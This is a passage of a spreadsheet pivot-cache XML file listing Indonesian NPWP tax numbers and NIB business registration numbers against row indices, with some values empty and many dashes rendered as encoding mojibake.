    <s v="npwp"/>
    <s v="03.264.419.7-823.000"/>
  </r>
  <r>
    <x v="488"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="489"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="490"/>
    <s v="npwp"/>
    <s v="02‚Äì919‚Äì715‚Äì9‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="490"/>
    <s v="nib"/>
    <n v="8120100950352"/>
  </r>
  <r>
    <x v="491"/>
    <s v="npwp"/>
    <s v="01‚Äì232‚Äì219‚Äì4‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="492"/>
    <s v="npwp"/>
    <s v="03‚Äì248‚Äì681‚Äì8‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="492"/>
    <s v="nib"/>
    <n v="8120009890683"/>
  </r>
  <r>
    <x v="493"/>
    <s v="npwp"/>
    <s v="01.891.866.4-041.000"/>
  </r>
  <r>
    <x v="494"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì497‚Äì6‚Äì051‚Äì000"/>
  </r>
  <r>
    <x v="495"/>
    <s v="npwp"/>
    <s v="81‚Äì827‚Äì625‚Äì5‚Äì645‚Äì000"/>
  </r>
  <r>
    <x v="496"/>
    <s v="npwp"/>
    <s v="03‚Äì346‚Äì766‚Äì3‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="497"/>
    <s v="npwp"/>
    <s v="01‚Äì511‚Äì652‚Äì8‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="497"/>
    <s v="nib"/>
    <n v="9120300250548"/>
  </r>
  <r>
    <x v="498"/>
    <s v="npwp"/>
    <s v="02‚Äì490‚Äì284‚Äì3‚Äì304‚Äì000"/>
  </r>
  <r>
    <x v="499"/>
    <s v="npwp"/>
    <s v="71‚Äì516‚Äì963‚Äì7‚Äì722‚Äì000"/>
  </r>
  <r>
    <x v="500"/>
    <s v="npwp"/>
    <s v="66‚Äì854‚Äì698‚Äì0‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="500"/>
    <s v="nib"/>
    <n v="8120108841969"/>
  </r>
  <r>
    <x v="501"/>
    <s v="npwp"/>
    <s v="73‚Äì774‚Äì009‚Äì2‚Äì722‚Äì000"/>
  </r>
  <r>
    <x v="502"/>
    <s v="npwp"/>
    <s v="02‚Äì220‚Äì042‚Äì2‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="502"/>
    <s v="nib"/>
    <n v="9120205141259"/>
  </r>
  <r>
    <x v="503"/>
    <s v="npwp"/>
    <s v="09‚Äì690‚Äì662‚Äì3‚Äì722‚Äì001"/>
  </r>
  <r>
    <x v="504"/>
    <s v="npwp"/>
    <s v="03‚Äì076‚Äì370‚Äì0‚Äì824‚Äì000"/>
  </r>
  <r>
    <x v="505"/>
    <s v="npwp"/>
    <s v="02‚Äì039‚Äì113‚Äì2‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="505"/>
    <s v="nib"/>
    <n v="8120001852794"/>
  </r>
  <r>
    <x v="506"/>
    <s v="npwp"/>
    <s v="03‚Äì093‚Äì809‚Äì6‚Äì031‚Äì000"/>
  </r>
  <r>
    <x v="507"/>
    <s v="npwp"/>
    <s v="82‚Äì405‚Äì094‚Äì2‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="507"/>
    <s v="nib"/>
    <n v="8120007961634"/>
  </r>
  <r>
    <x v="508"/>
    <s v="npwp"/>
    <s v="01‚Äì070‚Äì707‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="508"/>
    <s v="nib"/>
    <n v="8120219101125"/>
  </r>
  <r>
    <x v="509"/>
    <s v="npwp"/>
    <s v="02‚Äì528‚Äì606‚Äì3‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="509"/>
    <s v="nib"/>
    <n v="8120105920062"/>
  </r>
  <r>
    <x v="510"/>
    <s v="npwp"/>
    <s v="03‚Äì278‚Äì034‚Äì8‚Äì063‚Äì000"/>
  </r>
  <r>
    <x v="511"/>
    <s v="npwp"/>
    <s v="02‚Äì192‚Äì915‚Äì3‚Äì511‚Äì000"/>
  </r>
  <r>
    <x v="511"/>
    <s v="nib"/>
    <n v="8120114272207"/>
  </r>
  <r>
    <x v="512"/>
    <s v="npwp"/>
    <s v="01‚Äì957‚Äì626‚Äì3‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="513"/>
    <s v="npwp"/>
    <s v="01‚Äì792‚Äì952‚Äì2‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="514"/>
    <s v="npwp"/>
    <s v="64‚Äì254‚Äì932‚Äì3‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="515"/>
    <s v="npwp"/>
    <s v="15.643.236.5.726-000"/>
  </r>
  <r>
    <x v="516"/>
    <s v="npwp"/>
    <s v="82.897.815.5-823.001"/>
  </r>
  <r>
    <x v="517"/>
    <s v="npwp"/>
    <s v="07‚Äì508‚Äì310‚Äì5‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="518"/>
    <s v="npwp"/>
    <s v="25.337.169.4-047.000"/>
  </r>
  <r>
    <x v="519"/>
    <s v="npwp"/>
    <s v="82‚Äì647‚Äì314‚Äì2‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="520"/>
    <s v="npwp"/>
    <s v="02‚Äì189‚Äì244‚Äì3‚Äì037‚Äì000"/>
  </r>
  <r>
    <x v="520"/>
    <s v="nib"/>
    <n v="8120102890076"/>
  </r>
  <r>
    <x v="521"/>
    <s v="npwp"/>
    <s v="01‚Äì830‚Äì004‚Äì6‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="521"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="522"/>
    <s v="npwp"/>
    <s v="03‚Äì095‚Äì681‚Äì7‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="523"/>
    <s v="npwp"/>
    <s v="83‚Äì389‚Äì928‚Äì9‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="523"/>
    <s v="nib"/>
    <n v="9120106312428"/>
  </r>
  <r>
    <x v="524"/>
    <s v="npwp"/>
    <s v="01‚Äì557‚Äì197‚Äì9‚Äì026‚Äì000"/>
  </r>
  <r>
    <x v="525"/>
    <s v="npwp"/>
    <s v="02‚Äì914‚Äì371‚Äì6‚Äì043‚Äì000"/>
  </r>
  <r>
    <x v="526"/>
    <s v="npwp"/>
    <s v="31‚Äì462‚Äì917‚Äì1‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="526"/>
    <s v="nib"/>
    <n v="9120203102647"/>
  </r>
  <r>
    <x v="527"/>
    <s v="npwp"/>
    <s v="02‚Äì136‚Äì639‚Äì8‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="528"/>
    <s v="npwp"/>
    <s v="01‚Äì941‚Äì737‚Äì7‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="528"/>
    <s v="nib"/>
    <n v="9120106711308"/>
  </r>
  <r>
    <x v="529"/>
    <s v="npwp"/>
    <s v="01‚Äì517‚Äì118‚Äì4‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="530"/>
    <s v="npwp"/>
    <s v="01‚Äì233‚Äì310‚Äì0‚Äì723‚Äì001"/>
  </r>
  <r>
    <x v="531"/>
    <s v="npwp"/>
    <s v="74‚Äì129‚Äì957‚Äì2‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="532"/>
    <s v="npwp"/>
    <s v="01‚Äì494‚Äì150‚Äì4‚Äì725‚Äì000"/>
  </r>
  <r>
    <x v="532"/>
    <s v="nib"/>
    <n v="9120406152121"/>
  </r>
  <r>
    <x v="533"/>
    <s v="npwp"/>
    <s v="01‚Äì821‚Äì663‚Äì0‚Äì723‚Äì001"/>
  </r>
  <r>
    <x v="534"/>
    <s v="npwp"/>
    <s v="31‚Äì510‚Äì961‚Äì1‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="535"/>
    <s v="npwp"/>
    <s v="31‚Äì494‚Äì928‚Äì0‚Äì063‚Äì000"/>
  </r>
  <r>
    <x v="536"/>
    <s v="npwp"/>
    <s v="83‚Äì172‚Äì041‚Äì2‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="537"/>
    <s v="npwp"/>
    <s v="03‚Äì278‚Äì034‚Äì8‚Äì063‚Äì000"/>
  </r>
  <r>
    <x v="538"/>
    <s v="npwp"/>
    <s v="66‚Äì326‚Äì242‚Äì6‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="539"/>
    <s v="npwp"/>
    <s v="82‚Äì062‚Äì143‚Äì1‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="540"/>
    <s v="npwp"/>
    <s v="16‚Äì357‚Äì978‚Äì2‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="541"/>
    <s v="npwp"/>
    <s v="75‚Äì135‚Äì974‚Äì6‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="542"/>
    <s v="npwp"/>
    <s v="02‚Äì932‚Äì679‚Äì0‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="543"/>
    <s v="npwp"/>
    <s v="71‚Äì178‚Äì017‚Äì1‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="544"/>
    <s v="npwp"/>
    <s v="02‚Äì026‚Äì500‚Äì5‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="545"/>
    <s v="npwp"/>
    <s v="64‚Äì004‚Äì587‚Äì8‚Äì542‚Äì000"/>
  </r>
  <r>
    <x v="546"/>
    <s v="npwp"/>
    <s v="02.119.988.0‚Äì832.000"/>
  </r>
  <r>
    <x v="547"/>
    <s v="npwp"/>
    <s v="01.517.118.4‚Äì832.001"/>
  </r>
  <r>
    <x v="547"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="548"/>
    <s v="npwp"/>
    <s v="01‚Äì920‚Äì207‚Äì6‚Äì003‚Äì000"/>
  </r>
  <r>
    <x v="549"/>
    <s v="npwp"/>
    <s v="03‚Äì097‚Äì609‚Äì6‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="550"/>
    <s v="npwp"/>
    <s v="01‚Äì788‚Äì773‚Äì8‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="551"/>
    <s v="npwp"/>
    <s v="02.643.373.0-804.000"/>
  </r>
  <r>
    <x v="552"/>
    <s v="npwp"/>
    <s v="82‚Äì591‚Äì197‚Äì7‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="553"/>
    <s v="npwp"/>
    <s v="03‚Äì167‚Äì505‚Äì1‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="554"/>
    <s v="npwp"/>
    <s v="14‚Äì316‚Äì833‚Äì4‚Äì722‚Äì000"/>
  </r>
  <r>
    <x v="555"/>
    <s v="npwp"/>
    <s v="59.840.322.8-612.000"/>
  </r>
  <r>
    <x v="556"/>
    <s v="npwp"/>
    <s v="70‚Äì940‚Äì277‚Äì0‚Äì605‚Äì000"/>
  </r>
  <r>
    <x v="557"/>
    <s v="npwp"/>
    <s v="14‚Äì203‚Äì483‚Äì4‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="558"/>
    <s v="npwp"/>
    <s v="81‚Äì074‚Äì603‚Äì2‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="559"/>
    <s v="npwp"/>
    <s v="03‚Äì183‚Äì113‚Äì4‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="559"/>
    <s v="nib"/>
    <n v="8120103820691"/>
  </r>
  <r>
    <x v="560"/>
    <s v="npwp"/>
    <s v="76‚Äì457‚Äì680‚Äì7‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="560"/>
    <s v="nib"/>
    <n v="8120101932873"/>
  </r>
  <r>
    <x v="561"/>
    <s v="npwp"/>
    <s v="81‚Äì101‚Äì950‚Äì4‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="561"/>
    <s v="nib"/>
    <n v="8120002801796"/>
  </r>
  <r>
    <x v="562"/>
    <s v="npwp"/>
    <s v="01‚Äì920‚Äì207‚Äì6‚Äì003‚Äì000"/>
  </r>
  <r>
    <x v="563"/>
    <s v="npwp"/>
    <s v="03‚Äì136‚Äì808‚Äì7‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="564"/>
    <s v="npwp"/>
    <s v="81‚Äì107‚Äì015‚Äì0‚Äì429‚Äì000"/>
  </r>
  <r>
    <x v="565"/>
    <s v="npwp"/>
    <s v="46‚Äì807‚Äì320‚Äì2‚Äì728‚Äì000"/>
  </r>
  <r>
    <x v="566"/>
    <s v="npwp"/>
    <s v="01‚Äì517‚Äì118‚Äì4‚Äì608‚Äì001"/>
  </r>
  <r>
    <x v="566"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="567"/>
    <s v="npwp"/>
    <s v="70‚Äì151‚Äì131‚Äì3‚Äì085‚Äì000"/>
  </r>
  <r>
    <x v="568"/>
    <s v="npwp"/>
    <s v="07‚Äì118‚Äì167‚Äì1‚Äì113‚Äì000"/>
  </r>
  <r>
    <x v="568"/>
    <s v="nib"/>
    <n v="8120105870891"/>
  </r>
  <r>
    <x v="569"/>
    <s v="npwp"/>
    <s v="83‚Äì934‚Äì456‚Äì1‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="570"/>
    <s v="npwp"/>
    <s v="01‚Äì539‚Äì633‚Äì6‚Äì811‚Äì001"/>
  </r>
  <r>
    <x v="571"/>
    <s v="npwp"/>
    <s v="01‚Äì539‚Äì633‚Äì6‚Äì811‚Äì001"/>
  </r>
  <r>
    <x v="571"/>
    <s v="nib"/>
    <n v="8120014161372"/>
  </r>
  <r>
    <x v="572"/>
    <s v="npwp"/>
    <s v="02‚Äì932‚Äì738‚Äì4‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="573"/>
    <s v="npwp"/>
    <s v="21‚Äì139‚Äì275‚Äì8‚Äì405‚Äì000"/>
  </r>
  <r>
    <x v="573"/>
    <s v="nib"/>
    <n v="220100600656"/>
  </r>
  <r>
    <x v="574"/>
    <s v="npwp"/>
    <s v="73‚Äì916‚Äì664‚Äì3‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="574"/>
    <s v="nib"/>
    <n v="8120116180354"/>
  </r>
  <r>
    <x v="575"/>
    <s v="npwp"/>
    <s v="02.051.403.0‚Äì812.000"/>
  </r>
  <r>
    <x v="576"/>
    <s v="npwp"/>
    <s v="01‚Äì327‚Äì446‚Äì9‚Äì009‚Äì000"/>
  </r>
  <r>
    <x v="577"/>
    <s v="npwp"/>
    <s v="83‚Äì452‚Äì876‚Äì2‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="577"/>
    <s v="nib"/>
    <n v="9120002771752"/>
  </r>
  <r>
    <x v="578"/>
    <s v="npwp"/>
    <s v="72‚Äì278‚Äì845‚Äì2‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="579"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì631‚Äì000"/>
  </r>
  <r>
    <x v="579"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="580"/>
    <s v="npwp"/>
    <s v="75‚Äì772‚Äì982‚Äì7‚Äì645‚Äì000"/>
  </r>
  <r>
    <x v="581"/>
    <s v="npwp"/>
    <s v="75‚Äì900‚Äì117‚Äì5‚Äì645‚Äì000"/>
  </r>
  <r>
    <x v="582"/>
    <s v="npwp"/>
    <s v="82‚Äì405‚Äì094‚Äì2‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="583"/>
    <s v="npwp"/>
    <s v="01‚Äì438‚Äì617‚Äì1‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="584"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="584"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="585"/>
    <s v="npwp"/>
    <s v="03‚Äì064‚Äì707‚Äì7‚Äì411‚Äì000"/>
  </r>
  <r>
    <x v="586"/>
    <s v="npwp"/>
    <s v="01‚Äì438‚Äì633‚Äì8‚Äì627‚Äì001"/>
  </r>
  <r>
    <x v="587"/>
    <s v="npwp"/>
    <s v="02‚Äì541‚Äì715‚Äì5‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="588"/>
    <s v="npwp"/>
    <s v="81‚Äì276‚Äì479‚Äì3‚Äì414‚Äì000"/>
  </r>
  <r>
    <x v="589"/>
    <s v="npwp"/>
    <s v="14‚Äì020‚Äì289‚Äì6‚Äì908‚Äì000"/>
  </r>
  <r>
    <x v="590"/>
    <s v="npwp"/>
    <s v="01‚Äì112‚Äì532‚Äì5‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="591"/>
    <s v="npwp"/>
    <s v="02‚Äì963‚Äì533‚Äì1‚Äì086‚Äì000"/>
  </r>
  <r>
    <x v="592"/>
    <s v="npwp"/>
    <s v="06‚Äì911‚Äì745‚Äì5‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="593"/>
    <s v="npwp"/>
    <s v="01‚Äì446‚Äì766‚Äì6‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="593"/>
    <s v="nib"/>
    <n v="8120218151625"/>
  </r>
  <r>
    <x v="594"/>
    <s v="npwp"/>
    <s v="02.079.603.3‚Äì903.000"/>
  </r>
  <r>
    <x v="594"/>
    <s v="nib"/>
    <n v="8120001891266"/>
  </r>
  <r>
    <x v="595"/>
    <s v="npwp"/>
    <s v="01‚Äì871‚Äì297‚Äì6‚Äì507‚Äì001"/>
  </r>
  <r>
    <x v="596"/>
    <s v="npwp"/>
    <s v="01‚Äì896‚Äì243‚Äì1‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="597"/>
    <s v="npwp"/>
    <s v="01‚Äì125‚Äì517‚Äì1‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="597"/>
    <s v="nib"/>
    <n v="9120303331349"/>
  </r>
  <r>
    <x v="598"/>
    <s v="npwp"/>
    <s v="83‚Äì409‚Äì167‚Äì0‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="599"/>
    <s v="npwp"/>
    <s v="31‚Äì444‚Äì907‚Äì5‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="600"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì801‚Äì001"/>
  </r>
  <r>
    <x v="601"/>
    <s v="npwp"/>
    <s v="74‚Äì381‚Äì224‚Äì0‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="602"/>
    <s v="npwp"/>
    <s v="83‚Äì020‚Äì406‚Äì1‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="603"/>
    <s v="npwp"/>
    <s v="74‚Äì634‚Äì394‚Äì6‚Äì026‚Äì000"/>
  </r>
  <r>
    <x v="603"/>
    <s v="nib"/>
    <n v="8120112260369"/>
  </r>
  <r>
    <x v="604"/>
    <s v="npwp"/>
    <s v="76‚Äì024‚Äì467‚Äì3‚Äì657‚Äì000"/>
  </r>
  <r>
    <x v="605"/>
    <s v="npwp"/>
    <s v="02‚Äì967‚Äì847‚Äì1‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="605"/>
    <s v="nib"/>
    <n v="9120007231529"/>
  </r>
  <r>
    <x v="606"/>
    <s v="npwp"/>
    <s v="01‚Äì110‚Äì030‚Äì2‚Äì627‚Äì001"/>
  </r>
  <r>
    <x v="606"/>
    <s v="nib"/>
    <n v="9120303133305"/>
  </r>
  <r>
    <x v="607"/>
    <s v="npwp"/>
    <s v="03‚Äì184‚Äì631‚Äì4‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="607"/>
    <s v="nib"/>
    <n v="9120003252934"/>
  </r>
  <r>
    <x v="608"/>
    <s v="npwp"/>
    <s v="03‚Äì346‚Äì766‚Äì3‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="609"/>
    <s v="npwp"/>
    <s v="74‚Äì719‚Äì423‚Äì1‚Äì617‚Äì001"/>
  </r>
  <r>
    <x v="609"/>
    <s v="nib"/>
    <n v="8120002762444"/>
  </r>
  <r>
    <x v="610"/>
    <s v="npwp"/>
    <s v="71‚Äì516‚Äì963‚Äì7‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="611"/>
    <s v="npwp"/>
    <s v="09‚Äì690‚Äì959‚Äì3‚Äì722‚Äì000"/>
  </r>
  <r>
    <x v="612"/>
    <s v="npwp"/>
    <s v="09‚Äì694‚Äì725‚Äì4‚Äì722‚Äì000"/>
  </r>
  <r>
    <x v="613"/>
    <s v="npwp"/>
    <s v="70‚Äì058‚Äì048‚Äì3‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="613"/>
    <s v="nib"/>
    <n v="8120103811755"/>
  </r>
  <r>
    <x v="614"/>
    <s v="npwp"/>
    <s v="80‚Äì097‚Äì027‚Äì9‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="614"/>
    <s v="nib"/>
    <n v="9120000342569"/>
  </r>
  <r>
    <x v="615"/>
    <s v="npwp"/>
    <s v="70‚Äì028‚Äì435‚Äì9‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="616"/>
    <s v="npwp"/>
    <s v="70‚Äì028‚Äì435‚Äì9‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="617"/>
    <s v="npwp"/>
    <n v="64591415605"/>
  </r>
  <r>
    <x v="618"/>
    <s v="npwp"/>
    <s v="74‚Äì572‚Äì938‚Äì4‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="618"/>
    <s v="nib"/>
    <n v="8120101890393"/>
  </r>
  <r>
    <x v="619"/>
    <s v="npwp"/>
    <s v="81‚Äì737‚Äì297‚Äì2‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="619"/>
    <s v="nib"/>
    <n v="8120206733812"/>
  </r>
  <r>
    <x v="620"/>
    <s v="npwp"/>
    <s v="01‚Äì741‚Äì520‚Äì7‚Äì250‚Äì000"/>
  </r>
  <r>
    <x v="620"/>
    <s v="nib"/>
    <n v="9120106181842"/>
  </r>
  <r>
    <x v="621"/>
    <s v="npwp"/>
    <s v="01‚Äì497‚Äì580‚Äì9‚Äì625‚Äì001"/>
  </r>
  <r>
    <x v="622"/>
    <s v="npwp"/>
    <s v="01‚Äì083‚Äì284‚Äì8‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="622"/>
    <s v="nib"/>
    <n v="8120013012443"/>
  </r>
  <r>
    <x v="623"/>
    <s v="npwp"/>
    <s v="84.341.412.9.807.000"/>
  </r>
  <r>
    <x v="624"/>
    <s v="npwp"/>
    <s v="14‚Äì582‚Äì871‚Äì1‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="625"/>
    <s v="npwp"/>
    <s v="01‚Äì341‚Äì636‚Äì7‚Äì062‚Äì000"/>
  </r>
  <r>
    <x v="626"/>
    <s v="npwp"/>
    <s v="31‚Äì693‚Äì678‚Äì0‚Äì618‚Äì000"/>
  </r>
  <r>
    <x v="627"/>
    <s v="npwp"/>
    <s v="82‚Äì953‚Äì066‚Äì6‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="628"/>
    <s v="npwp"/>
    <s v="31‚Äì422‚Äì336‚Äì3‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="629"/>
    <s v="npwp"/>
    <s v="01‚Äì871‚Äì438‚Äì6‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="630"/>
    <s v="npwp"/>
    <s v="72‚Äì472‚Äì462‚Äì0‚Äì418‚Äì000"/>
  </r>
  <r>
    <x v="631"/>
    <s v="npwp"/>
    <s v="80‚Äì258‚Äì436‚Äì7‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="632"/>
    <s v="npwp"/>
    <s v="01‚Äì768‚Äì295‚Äì6‚Äì903‚Äì001"/>
  </r>
  <r>
    <x v="633"/>
    <s v="npwp"/>
    <s v="01‚Äì799‚Äì709‚Äì9‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="634"/>
    <s v="npwp"/>
    <s v="01‚Äì873‚Äì051‚Äì5‚Äì901‚Äì000"/>
  </r>
  <r>
    <x v="635"/>
    <s v="npwp"/>
    <s v="01‚Äì112‚Äì534‚Äì1‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="635"/>
    <s v="nib"/>
    <n v="9120003100178"/>
  </r>
  <r>
    <x v="636"/>
    <s v="npwp"/>
    <s v="02‚Äì303‚Äì923‚Äì3‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="637"/>
    <s v="npwp"/>
    <s v="01‚Äì071‚Äì640‚Äì5‚Äì058‚Äì000"/>
  </r>
  <r>
    <x v="638"/>
    <s v="npwp"/>
    <s v="83‚Äì771‚Äì801‚Äì4‚Äì028‚Äì000"/>
  </r>
  <r>
    <x v="639"/>
    <s v="npwp"/>
    <s v="34‚Äì330‚Äì478‚Äì8‚Äì121‚Äì000"/>
  </r>
  <r>
    <x v="640"/>
    <s v="npwp"/>
    <s v="89‚Äì948‚Äì982‚Äì7‚Äì571‚Äì000"/>
  </r>
  <r>
    <x v="640"/>
    <s v="nib"/>
    <n v="8120214080295"/>
  </r>
  <r>
    <x v="641"/>
    <s v="npwp"/>
    <s v="14‚Äì454‚Äì241‚Äì2‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="642"/>
    <s v="npwp"/>
    <s v="03‚Äì280‚Äì423‚Äì9‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="642"/>
    <s v="nib"/>
    <n v="8120202941695"/>
  </r>
  <r>
    <x v="643"/>
    <s v="npwp"/>
    <s v="74‚Äì610‚Äì661‚Äì6‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="644"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="644"/>
    <s v="nib"/>
    <n v="8120211191565"/>
  </r>
  <r>
    <x v="645"/>
    <s v="npwp"/>
    <s v="84‚Äì146‚Äì355‚Äì7‚Äì619‚Äì000"/>
  </r>
  <r>
    <x v="645"/>
    <s v="nib"/>
    <n v="8120107901875"/>
  </r>
  <r>
    <x v="646"/>
    <s v="npwp"/>
    <s v="08‚Äì320‚Äì718‚Äì3‚Äì701‚Äì000"/>
  </r>
  <r>
    <x v="647"/>
    <s v="npwp"/>
    <s v="03.197.358.9-821.000"/>
  </r>
  <r>
    <x v="648"/>
    <s v="npwp"/>
    <s v="02‚Äì881‚Äì392‚Äì1‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="649"/>
    <s v="npwp"/>
    <s v="72‚Äì971‚Äì828‚Äì8‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="650"/>
    <s v="npwp"/>
    <s v="71‚Äì605‚Äì591‚Äì8‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="651"/>
    <s v="npwp"/>
    <s v="01‚Äì872‚Äì915‚Äì2‚Äì904‚Äì000"/>
  </r>
  <r>
    <x v="651"/>
    <s v="nib"/>
    <n v="8120013121407"/>
  </r>
  <r>
    <x v="652"/>
    <s v="npwp"/>
    <s v="76‚Äì937‚Äì341‚Äì6‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="653"/>
    <s v="npwp"/>
    <s v="03‚Äì280‚Äì992‚Äì3‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="653"/>
    <s v="nib"/>
    <n v="8120202921149"/>
  </r>
  <r>
    <x v="654"/>
    <s v="npwp"/>
    <s v="83‚Äì626‚Äì470‚Äì5‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="655"/>
    <s v="npwp"/>
    <s v="02‚Äì041‚Äì329‚Äì0‚Äì811‚Äì000"/>
  </r>
  <r>
    <x v="656"/>
    <s v="npwp"/>
    <s v="01‚Äì225‚Äì202‚Äì9‚Äì123‚Äì000"/>
  </r>
  <r>
    <x v="656"/>
    <s v="nib"/>
    <n v="8120101920359"/>
  </r>
  <r>
    <x v="657"/>
    <s v="npwp"/>
    <s v="26‚Äì368‚Äì150‚Äì4‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="658"/>
    <s v="npwp"/>
    <s v="02‚Äì444‚Äì268‚Äì3‚Äì113‚Äì000"/>
  </r>
  <r>
    <x v="658"/>
    <s v="nib"/>
    <n v="8120004812036"/>
  </r>
  <r>
    <x v="659"/>
    <s v="npwp"/>
    <s v="80‚Äì018‚Äì240‚Äì4‚Äì941‚Äì000"/>
  </r>
  <r>
    <x v="659"/>
    <s v="nib"/>
    <n v="8120113030328"/>
  </r>
  <r>
    <x v="660"/>
    <s v="npwp"/>
    <s v="70‚Äì087‚Äì675‚Äì8‚Äì724‚Äì000"/>
  </r>
  <r>
    <x v="660"/>
    <s v="nib"/>
    <n v="9120301832513"/>
  </r>
  <r>
    <x v="661"/>
    <s v="npwp"/>
    <s v="70‚Äì194‚Äì103‚Äì1‚Äì724‚Äì000"/>
  </r>
  <r>
    <x v="662"/>
    <s v="npwp"/>
    <s v="02‚Äì638‚Äì777‚Äì9‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="662"/>
    <s v="nib"/>
    <n v="8120312042393"/>
  </r>
  <r>
    <x v="663"/>
    <s v="npwp"/>
    <s v="08‚Äì632‚Äì217‚Äì9‚Äì609‚Äì000"/>
  </r>
  <r>
    <x v="664"/>
    <s v="npwp"/>
    <s v="03‚Äì255‚Äì900‚Äì7‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="665"/>
    <s v="npwp"/>
    <s v="80‚Äì939‚Äì907‚Äì4‚Äì122‚Äì000"/>
  </r>
  <r>
    <x v="665"/>
    <s v="nib"/>
    <n v="8120319012735"/>
  </r>
  <r>
    <x v="666"/>
    <s v="npwp"/>
    <s v="01‚Äì872‚Äì047‚Äì4‚Äì112‚Äì001"/>
  </r>
